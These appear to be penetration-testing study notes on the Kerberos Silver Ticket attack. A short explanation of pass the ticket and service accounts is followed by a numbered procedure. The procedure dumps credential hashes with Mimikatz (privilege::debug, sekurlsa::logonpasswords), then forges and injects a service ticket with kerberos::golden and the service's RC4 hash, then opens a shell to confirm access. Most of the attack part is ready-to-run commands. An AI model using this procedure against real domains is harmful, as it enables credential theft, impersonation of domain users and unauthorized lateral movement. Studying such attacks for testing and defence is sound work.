Silver Ticket Attack

Silver Ticket Attack

• the overpass the hash technique to acquire a Kerberos TGT, allowing us to authenticate using Kerberos. We can only use the TGT on the machine it was created for, but the TGS potentially offers more flexibility

  The Pass the Ticket attack takes advantage of the TGS, which may be exported and re-injected elsewhere on the network and then used to authenticate to a specific service. In addition, if the service tickets belong to the current user, then no administrative privileges are required. So far, this attack does not provide us with any additional access, but it does offer flexibility in being able to choose which machine to use the ticket from. However, if a service is registered with a service principal name, this scenario becomes more interesting. Previously, we demonstrated that we could crack the service account password hash and obtain the password from the service ticket. This password could then be used to access resources available to the service account. However, if the service account is not a local administrator on any servers, we would not be able to perform lateral movement using vectors such as pass the hash or overpass the hash and therefore, in these cases, we would need to use a different approach.

1. whoami /user to get SID like S-1-5-21-1602875587-2787523311-2599479668-1103 The SID defining the domain is the entire string except the RID at the end ( -1103 )

2. Extract hash of the service

   1. Mimikatz.exe

   2. privilege::debug

   3. sekurlsa::logonpasswords

3. kerberos::purge to delete existing ticket

4. kerberos::list to verify

5. kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /target:<fully qualified host name of the service> /service:<service_name>/rc4:<password hash of that service> /ptt

6. misc::cmd to launch cmd to verify the success

Reference:

silver ticket attack:- https://www.netwrix.com/silver_ticket_attack_forged_service_tickets.html